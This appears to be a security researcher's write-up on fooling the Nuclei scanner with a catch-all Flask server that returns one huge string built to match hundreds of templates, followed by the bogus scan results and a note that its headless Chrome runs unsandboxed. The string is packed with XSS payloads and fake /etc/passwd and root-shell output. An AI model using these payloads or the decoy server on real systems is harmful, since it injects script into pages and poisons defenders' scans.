    configuration for WordPressdefine( 'DB_NAME',define( 'DB_PASSWORD',PictureInfo/output/CirCarLife
    Scadavar valueUser =
    "j";-alert(1)-"x";</script><script>alert(document.domain)</script>http</script><script>alert(document.domain)</script>calling
    init:
    /lib/http</script><script>alert(document.domain)</script>application/json///sessions"date":"message":"trace":[<script>alert(1337)</script><!--</TITLE>Failed
    to retrieve RMIServer stub: javax.naming.CommunicationException: 127.0.0.1:1389httpCirCarLife
    ScadaphpinfoPHP
    Version<h1xxx<scriptalert(1)</script<svg/onload=alert(1337)>26ec00a3a03f6bfc5226fd121567bb58Fatal
    error: Class 'PHPUnit_Framework_TestCase' not found in
    /application/third_party/CIUnit/libraries/CIUnitTestCase.php on lineDB_NAMEDB_PASSWORDDB_HOSTThe
    base configurations of the WordPress"><script>alert("1")</script>Unexpected text in
    DTDpackage#vulntestroot:/root:/bin/bashContent-Type:
    text/csv</script><script>alert(document.domain)</script>for 16-bit app
    support"><script>alert(document.domain)</script></sCripT><sCripT>alert(document.domain)</sCripT></script><script>alert(document.domain)</script></script><script>alert(document.domain)</script></script><script>alert(document.domain)</script></script><script>alert(document.domain)</script></script><script>alert(document.domain)</script></script><script>alert(document.domain)</script></script><script>alert(document.domain)</script></script><script>alert(document.domain)</script></script><script>alert(document.domain)</script></script><script>alert(document.domain)</script></script><script>alert(document.domain)</script></script><script>alert(document.domain)</script></script><script>alert(document.domain)</script>"></script><script>alert(document.domain)</script></script><script>alert(document.domain)</script></script><script>alert(document.domain)</script></script><script>alert(document.domain)</script></script><script>alert(document.domain)</script></script><script>alert(document.domain)</script></script><script>alert(document.domain)</script></script><script>alert(document.domain)</script></script><script>alert(document.domain)</script></script><script>alert(document.domain)</script></script><script>alert(document.domain)</script></script><script>alert(document.domain)</script><"</script><script>alert(document.domain)</script></script><script>alert(document.domain)</script>"><script>alert(document.domain);</script><"input
    type="text"
    name="ContactId"</script><script>alert(document.domain)</script></script><script>alert(document.domain)</script></script><script>alert(document.domain)</script></script><script>alert(document.domain)</script></script><script>alert(document.domain)</script>Nuclei:
    CVE-2016-10960wp-login.php?checkemail=confirmapplication/json</script><script>alert(document.domain)</script></script><script>alert(document.domain)</script>text/htmlcf79ae6addba60ad018347359bd144d2</script><script>alert(document.domain)</script>httpPHP
    Credits<script>alert('{{randstr}}')</script></script><script>alert(document.domain)</script></script><script>alert(document.domain)</script>http<script>confirm({{randstr}})</script>SIS-REWEhttpNetpDoDomainJoin:</script><script>alert(document.domain)</script>application/xml/Success.htm</script><script>alert(document.domain)</script>mec-eventstext/csvtext/plainWelcome
    to your WordPress
    DashboardcommandResultuid=http</script><script>alert(document.domain)</script>uid=gid=groups=http</script><script>alert(document.domain)</script>application/x-javascriptdef_wirelesspassword
    =<title>Roteador
    Wireless</title></script><script>alert(document.domain)</script>http<script>alert(document.domain)</script>application/json</script><script>alert(document.domain)</script></title><script>alert('{{randstr}}')</script>"HTTP_X_TRIGGER_XSS":"<script>alert(1)</script>"The
    attribute valuejava.lang.UNIXProcess@has invalid value!"status" :
    "400"XMLHttpRequest.prototype.open<p:StdOut>uid=0(root) gid=0(root)
    groups=0returntagjidsaltwheelvRealize Operations ManagerthumbprintaddresshttpApache Server
    StatusServer
    Versiontext/html<script>alert(document.domain);</script>/wp-content/themes/realestateuid=gid=groups=VoIPmonitor
    installationapplication/jsonIndex of /cache/backupParent Directory.sql.gz<script
    type="text/javascript">var d = new
    Date();window.parent.$("#mobLogo").attr("src","/temp/tempMobPreview.jpeg?"+d.getTime());window.parent.$("#tabLogo").attr("src","/temp/tempMobPreview.jpeg?"+d.getTime());</script>{{randstr}}.tldEXPONENT.PATHEXPONENT.URL"zlo
    onerror=alert(1) "Device Status
    Graphhttponmouseover="alert('nuclei')root_causetruncatedreasonfor 16-bit app supportJH 404
    LoggerMicrosoft.Exchange.Clients.Owa2.Server.Core.OwaADUserNotFoundExceptionExchange MAPI/HTTP
    Connectivity
    Endpoint<SERIAL><VERSION>uidgidgroups</script><script>alert(document.domain)</script></script><script>alert(document.domain)</script></script><script>alert(document.domain)</script>httpinput/Autofocus/%0D*/Onfocus=alert(123);goto-tour-list-js-extra<str
    name="status">OK</str>alert(document.domain);"zlo onerror=alert(1) "Device Status
    Graph{"result":{"isDisconnected":text/html"zlo onerror=alert(1) "Device Status
    Graph</script><script>alert(document.domain)</script>text/htmlnucleiNo policy has been
    chosen.</script><script>alert(document.domain)</script>application/json</script><script>alert(document.domain)</script>syslog:admin/etc_ro/lighttpd/wwwhttp709b38b27304df6257a86a60df742c4c><svg/onload=alert(1)><Calendar
    DetailsPHP ExtensionPHP
    Version"></script><script>alert(document.domain)</script>application/pdffilename="dompdf_out.pdf"DB_NAMEDB_PASSWORD</textarea></script><script>alert(document.domain)</script></script><script>alert(document.domain)</script>'></script><script>alert(document.domain)</script>please
    input shell commandZTE Corporation. All rights
    reservedapplication/json<script>alert(1)</script>DB_NAMEDB_PASSWORDDB_USERDB_HOST<userauth><password>Level
    was:
    LEVEL15/WEB_VMS/LEVEL15/https://weiphp.cnWeiPHPDB_PREFIX"username":"anonymous""Administrator""newPassword":""Application
    ServerManagement
    ConsoleserverIdentifiercompanyNamehadoopVersionresourceManagerVersionBuiltOnxdebug.remote_connect_back</td><td
    class="v">On</td><td class="v">On</td>"id":"version":"method":"url":"time":<title>Database
    Error</title>Request URI: /examples/jsp/snp/snoop.jsp<fieldset id="adminaccount"><legend>Create
    an <strong>admin account</strong></legend><legend><a id="showAdvanced" tabindex="0"
    href="#">Storage &amp; databaseapplication/jsonUnfortunately the article you are looking for
    could not be found.dns"took":TCP/IP Configuration<title>Network - Plastic
    SCM</title>httppool:process manager:start
    time:pid:{"runs":[{"id":resource_references<title>Alertmanager</title>var db    =
    'information_schema';var opendb_url = 'db_structure.php';Welcome to Zenphoto! This page will set
    up ZenphotoTraffic and system resource graphingMultimon: UPS Status PageContexts known to this
    server are:{"Uri":"/worker","Method":"GET"}Monitoring JavaMelody onRack
    Environment"roles""permissions""role""kv"<ListBucketResult xmlns=# -FrontPage-<title>Solr admin
    page</title>scalarsloading_mechanismcustom_scalars<title>ViewPoint System
    Status</title>HTTP_ACCEPTHTTP_ACCEPT_ENCODINGnode_cooling_devicenode_networkvti_extenderversion:FPVersion=<HEAD><TITLE>Display
    file upload form to the user</TITLE></HEAD>Druid Stat Index</title>Apache Server StatusServer
    VersionkibanaWelcomeViewcluster_uuidkibanaWelcomeLogokibanaWelcomeTitleJSP ExamplesJSP
    SamplesServlets ExamplesWebSocket Examples<title>Home - Mongo Express</title><title>system.users
    - Mongo Express</title>"ParentId":"Container":"Labels":PRTG Traffic
      Grapher"repoKey""repositories":applicationNameserviceTypeaura:invalidSessionWhoops! There was
      an error<title>Warning [refreshed every 30 sec.]</title>Popup
      Uploadpython_gc_objects_collected_totalpython_infoUser sign up completed
      successfully<title>Android Debug Database</title>autodiscover.interact.sh<title>phpMyAdmin
      setup</title><title>Horde :: User Administration</title><title>200 Purged</title>"status":
      "ok"<title>Kafdrop: Broker List</title>Kafka Cluster Overviewhttplsmkdir chmod mv nano vim
      pico sudo cd cp ps aux URLconf definedPage not foundDjango tried these URL patterns, in this
      orderAPCu Version InformationGeneral Cache InformationDetailed Memory Usage and
      FragmentationContent-Type: application/json<title>JK Status
      Manager</title><title>SQLiteManager</title>Create dashboardZabbix SIAStatistics Report for
      HAProxyHP<h1>SNMP</h1>"><svg onload=confirm(document.domain)>Suggestions for improving the
      resultsX-Debug-Token-Link:/_profiler/can_execute_commands":"a.":"A.title="~system"NetWeaverapiVersionOverview
      - Kubernetes Resource ReportnamespaceHELPTYPEkubeapplication/json<title>Snippets · Explore ·
    GitLab</title><a data-qa-selector="register_link" href="/users/sign_up">Register
    now</a>data-qa-selector="new_user_register_button"Set-Cookie: _gitlab_session=Content-Type:
    text/html<h1> Ooops. </h1>Traceback (most recent call last)Nginx Vhost Traffic
    StatusHostZoneActive connections:<H1>OK</H1><title>Groovy Console</title>Run ScriptGroovy
    Web
    ConsolebuildCountdownloadNameacHandling"status""diskSpace""jms"mappingsmethodproducesthreadNamethreadIdwaitedTimelockNamestackTracemethodName"loggers""levels""build""artifact""type""beans""dependencies""scope"positiveMatchesAuditAutoConfiguration#auditListenerEndpointAutoConfiguration#beansEndpointorg.springframework.boot.actuatebeanscontexts"threads":"threadName":applicationConfigactiveProfiles"timestamp""info""method""path"memmem.freeprocessorsinstance.uptimesystemload.averagenonheap.initheap.committed"traces""timestamp""principal""session"package=Administrators
    name:Support Administrators email address:Web-FTPsquare loginX-Jenkins<title>Froxlor Server
    Management Panel</title><title>IBM HTTP
    Server</title>access_keyterraform<title>OneBlog开源博客后台管理系统</title><title>Payara
    Server - Server Running</title><!-- Element where elFinder will be created (REQUIRED)
    -->Nexus Repository Manager<title>Strapi Admin</title><title>OWASP Juice
    Shop</title>GraylogREST API browserswagger<title>Elasticsearch-sql
    client</title><title>Dotclear</title>defaultmy_idroot_url<title>Sage
    X3</title><title>GlassFish Server - Server Running</title><title>Daybyday -
    Login</title><title>Centreon - IT & Network Monitoring</title><title>Test Page for the
    Apache HTTP Server on Red Hat Enterprise Linux</title><title>Operations Automation Default
    Page</title><title>Powered by lighttpd</title>"_links":"self":"health"<TITLE>Powered By
    Jetty</TITLE>gotmls<title>Home Assistant</title><title>Test Page for the HTTP Server on
    Fedora</title><TITLE>Olivetti CRF</TITLE><title>TurnKey NGINX PHP FastCGI
    Server</title><title>Webmodule</title><title>SeedDMS: Sign in</title>urlArgs : "v=Sign in to
    OpenAMForgeRockforgerockFRForgotUsernamesuccessfulUserRegistrationDestination&quot;id&quot;:&quot;wazuh&quot;&quot;title&quot;:&quot;Wazuh&quot;&quot;icon&quot;:&quot;plugins/wazuh/img/icon_blue.png&quot;&quot;url&quot;:&quot;/app/wazuh&quot;var
    nc_lastLogin<title>PHP-Proxy</title><title>Node-RED</title><a href="http://moinmo.in/"
    title="This site uses the MoinMoin Wiki software.">MoinMoin Powered</a><a
    href="http://moinmo.in/Python" title="MoinMoin is written in Python.">Python
    Powered</a><a><b>XXL</b>JOB</a><title>AContent : Home</title>AContent - Copyright 2010 by
    IDRC/IDI http://inclusivedesign.ca/<title>BookStack</title><span
    class="logo-text">BookStack</span>Welcome to the Artica Web Administration Interface: Web
    Accessibility Checker</title>AChecker - Copyrightoctober_session<title>Mautic</title><div
    class="mautic-logoPowered by WonderCMShttps://www.wondercms.comrx_sesskey1Powered by
    Gitea<title>YApi-高效易用功能强大的可视化接口管理平台</title><meta name="generator"
    content="Plone - <div
    xmlns:css="http://namespaces.plone.org/diazo/css"/++plone++static/plone-compiled.css/++plone++static/tinymce-styles.css>Powered
    by Plone &amp; Python</a>javax.faces.resourcejavax.faces.ViewState<title>Burp
    API</title>Home Page - My ASP.NET Application<title>Ticket BBCode editor -
    SCEditor</title>title="SCEditor"<title>Web Server's Default
    Page</title><title>PhpCollab</title>Homepage | Gila CMS<meta name="generator" content="Gila
    CMS">Powered by wuzhicms<h1>Interactive Console</h1>X-Powered-By: Craft CMS<title>openSIS
    Student Information System</title><title>Authenticate Please!</title><form
    action="/bolt/login"<img class="logo" alt="Bolt CMS logo"<img
    src="/app/view/img/bolt-logo.png"<link rel="shortcut icon"
    href="/app/view/img/favicon-bolt.ico"><link rel="stylesheet"
    href="/app/view/css/bolt-old-ie.css"<link rel="stylesheet"
    href="/app/view/css/bolt.css"<script src="/app/view/js/bolt.js"></script><script
    src="/app/view/js/bolt.min.js"<script src="/assets/bolt.js"></script>Bolt requires
    JavaScript to function properly and continuing without it might corrupt or erase data.Bolt »
    LoginCookies are required to log on to Bolt. Please allow
    cookies.<title>BigBlueButton</title><title>Harbor</title>iPlanet<title>json-web-services-api</title>There
    are no services matching that phrase.Unable to deserialize
    objectWebLogic<title>Opencast</title>name="application-name" content="Jellyfin"class="page
    homePage libraryPage allLibraryPage backdropPage pageWithAbsoluteTabs withTabs"The Free
    Software Media System<title>CrushFTP WebInterface</title><title>- AvantFAX -
    Login</title><title>Jitsi Meet</title>Welcome to the BIG-IPConfiguration
    Utility<title>Kibana</title>kibanaLoaderWrapkibanaLoaderxpackElasticsearch B.V<title>Rapid
    web development with Lucee!</title><title>Jeedom</title><title>HTTP Server Test Page powered
    by CentOS-WebPanel.com</title><title> eG Innovations, Inc.</title>eG Innovations, Inc. All
    Rights ReservedPCoIP Connection Manager<title>druid monitor</title><title>Welcome to
    OpenResty!</title><TITLE>Test Page for the SSL/TLS-aware Apache Installation on Web
    Site</TITLE>rememberMe=deleteMe<title>HP BladeSystem Onboard
    Administrator</title>Set-Cookie: grav-site-<title>iTop
    login</title>"timestamp":"protocol":"agent":Realisiert mit ShopwareRealised with
    ShopwareShopware Administration (c) shopware AG<title>Shopware 5 - Backend (c) shopware
    AG</title>-Confluence--confluence-Welcome to Abyss Web Servermagmi_multifield"description"
    :"The Pega APIX-Powered-By: ThinkCMFThis is a SOCKS
    ProxyHTTPTunnelPortSOCKSPortversion.services.core.carbon.wso2.org<title>Hello! Welcome to
    Synology Web Station!</title><li><a
    href="http://docs.aws.amazon.com/elasticbeanstalk/latest/dg/Welcome.html">AWS Elastic
    Beanstalk overview</a></li><li><a
    href="http://docs.amazonwebservices.com/elasticbeanstalk/latest/dg/">AWS Elastic Beanstalk
    overview</a></li>TIBCO Jaspersoft: LoginCould not login to JasperReports ServerAbout TIBCO
    JasperReports Server<title>Login utilisateur Gespage</title><title>InfluxDB - Admin
    Interface</title><title>The install worked successfully!
    Congratulations!</title>CFG_GLPI_glpi_csrf_tokenGLPI CopyrightREDCapVanderbilt
    UniversityThis error page was generated by SAP Web DispatcherBasic realm="WEB ADMIN"SAP
    NetWeaver Application Serversap-system-login<title>Logon</title>SAP IGSis runningKubernetes
    Enterprise ManagergitVersiongoVersionplatformMirantis Kubernetes EngineReport
    Manager<title>Microsoft Azure App Service - Welcome</title><title>IIS Windows
    Server</title><title>IIS7</title><title>Welcome to nginx!</title><title>Test Page for the
    Nginx HTTP Server on Amazon Linux</title>RadAsyncUpload handler is registered
    succesfullyOracle iPlanet Web Server<TITLE>Oracle Application Server Containers for J2EE
    10g</TITLE><title>Oracle HTTP Server 12c</title><title>Oracle Database as a
    Service</title><title>DBaaS Monitor</title>Could not parse auth
    tokenx-goog-metagenerationX-Goog-MetagenerationValidateWelcomeAxisdeployedinstallationAdmin<title>Apache
    TomcatApache TomcatApache Guacamole<title>Welcome to XAMPP</title>Airflow 404 = lots of
    circles<title>Apache HTTP Server Test Page powered by CentOS</title><title>Apache2 Ubuntu
    Default Page: It works</title><title>Apache2 Debian Default Page: It works</title>ColdFusion
    documentation

(bit of overkill, I know)

Example of a false positive server :

# coding: utf-8
from flask import Flask, render_template

app = Flask(__name__, template_folder='.')

@app.route('/', defaults={'path': ''})
@app.route('/<path:path>')
def catch_all(path):
    return BAD_NUCLEI_STRING_FROM_ABOVE

if __name__ == "__main__":
    app.run(host='0.0.0.0', debug=True)
  1. Fun
$ nuclei -u http://192.168.0.6:5000/

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   2.5.2

        projectdiscovery.io

[WRN] Use with caution. You are responsible for your actions.
[WRN] Developers assume no liability and are not responsible for any misuse or damage.
[INF] Using Nuclei Engine 2.5.2 (latest)
[INF] Using Nuclei Templates 8.5.4 (latest)
[INF] Using Interactsh Server https://interact.sh
[INF] Templates added in last update: 117
[INF] Templates loaded for scan: 2026
[INF] Templates clustered: 316 (Reduced 292 HTTP Requests)
[2021-09-28 09:04:37] [zhiyuan-file-upload] [http] [critical] http://192.168.0.6:5000/seeyon/thirdpartyController.do.css/..;/ajax.do
[2021-09-28 09:04:37] [tictail-takeover] [http] [high] http://192.168.0.6:5000/
[2021-09-28 09:04:37] [github-takeover] [http] [high] http://192.168.0.6:5000/
[2021-09-28 09:04:37] [addeventlistener-detect] [http] [info] http://192.168.0.6:5000/
[2021-09-28 09:04:37] [kinsta-takeover] [http] [high] http://192.168.0.6:5000/
[2021-09-28 09:04:37] [kubernetes-mirantis] [http] [info] http://192.168.0.6:5000/
[2021-09-28 09:04:37] [ambari-exposure] [http] [medium] http://192.168.0.6:5000/
[2021-09-28 09:04:37] [kubernetes-dashboard] [http] [low] http://192.168.0.6:5000/
[2021-09-28 09:04:37] [default-asp.net-page] [http] [info] http://192.168.0.6:5000/
[2021-09-28 09:04:37] [pingdom-takeover] [http] [high] http://192.168.0.6:5000/
[2021-09-28 09:04:37] [shopify-takeover] [http] [high] http://192.168.0.6:5000/
[2021-09-28 09:04:37] [jazzhr-takeover] [http] [high] http://192.168.0.6:5000/
[2021-09-28 09:04:37] [CVE-2018-7422] [http] [high] http://192.168.0.6:5000/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=../../../../../../../wp-config.php
[2021-09-28 09:04:37] [CVE-2018-7422] [http] [high] http://192.168.0.6:5000/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd
[2021-09-28 09:04:37] [symantec-epm-login] [http] [info] http://192.168.0.6:5000/
[2021-09-28 09:04:37] [druid-console-exposure] [http] [medium] http://192.168.0.6:5000/
[2021-09-28 09:04:37] [hatenablog-takeover] [http] [high] http://192.168.0.6:5000/
[2021-09-28 09:04:37] [epmp-login] [http] [info] http://192.168.0.6:5000/
[2021-09-28 09:04:37] [bigbluebutton-detect] [http] [info] http://192.168.0.6:5000/
[2021-09-28 09:04:37] [wondercms-detect] [http] [info] http://192.168.0.6:5000/
[2021-09-28 09:04:37] [manageengine-assetexplorer] [http] [info] http://192.168.0.6:5000/
[2021-09-28 09:04:37] [owncloud-config] [http] [info] http://192.168.0.6:5000/owncloud/config/
[2021-09-28 09:04:37] [oracle-http-server-12c] [http] [info] http://192.168.0.6:5000/
[2021-09-28 09:04:37] [lucee-stack-trace] [http] [low] http://192.168.0.6:5000/
[2021-09-28 09:04:37] [worksites-takeover] [http] [high] http://192.168.0.6:5000/
[2021-09-28 09:04:37] [default-microsoft-azure-page] [http] [info] http://192.168.0.6:5000/
[2021-09-28 09:04:37] [wishpond-takeover] [http] [high] http://192.168.0.6:5000/
[2021-09-28 09:04:37] [iplanet-web-server] [http] [info] http://192.168.0.6:5000/
[2021-09-28 09:04:37] [manageengine-supportcenter] [http] [info] http://192.168.0.6:5000/
[2021-09-28 09:04:37] [manageengine-opmanager] [http] [info] http://192.168.0.6:5000/
[2021-09-28 09:04:37] [rocketmq-console-exposure] [http] [info] http://192.168.0.6:5000/
[2021-09-28 09:04:37] [flink-exposure] [http] [low] http://192.168.0.6:5000/
[2021-09-28 09:04:37] [wuzhicms-detect] [http] [info] http://192.168.0.6:5000/
[2021-09-28 09:04:37] [android-debug-database-exposed] [http] [low] http://192.168.0.6:5000/
[2021-09-28 09:04:37] [olivetti-crf-detect] [http] [info] http://192.168.0.6:5000/
[2021-09-28 09:04:37] [yapi-detect] [http] [info] http://192.168.0.6:5000/
[2021-09-28 09:04:37] [freshdesk-takeover] [http] [high] http://192.168.0.6:5000/
[2021-09-28 09:04:37] [aws-bucket-takeover] [http] [high] http://192.168.0.6:5000/
[2021-09-28 09:04:37] [simplebooklet-takeover] [http] [high] http://192.168.0.6:5000/
[2021-09-28 09:04:37] [kafka-monitoring] [http] [low] http://192.168.0.6:5000/
[2021-09-28 09:04:37] [default-nginx-page] [http] [info] http://192.168.0.6:5000/
[2021-09-28 09:04:37] [mashery-takeover] [http] [high] http://192.168.0.6:5000/
...
This continues for 800 lines ...
...

You can also do a Reverse Nuclei Proxy that identifies the incoming Nuclei request and outputs the expected template matcher. I started coding this, but the demonic string above is cooler and easier.

Headless Chrome

As seen above, the Headless Chrome of Nuclei runs WITHOUT the Sandbox.

    previouspids := findChromeProcesses()
    chromeLauncher := launcher.New().
        Leakless(false).
        Set("disable-gpu", "true").
        Set("ignore-certificate-errors", "true").
        Set("ignore-certificate-errors", "1").
        Set("disable-crash-reporter", "true").
        Set("disable-notifications", "true").
        Set("hide-scrollbars", "true").
        Set("window-size", fmt.Sprintf("%d,%d", 1080, 1920)).
        Set("no-sandbox", "true").
        Set("mute-audio", "true").
        Set("incognito", "true").
        Delete("use-mock-keychain").
        UserDataDir(dataStore)

https://github.com/projectdiscovery/nuclei/blob/f5fb8aa305121ceb28981436008acb180b99f0fc/v2/pkg/protocols/headless/engine/engine.go#L46

So every 1day on chrome will become a RCE on Nuclei. Dont ever run -headless I guess.

( ´ ▽ ` )/


by @caioluders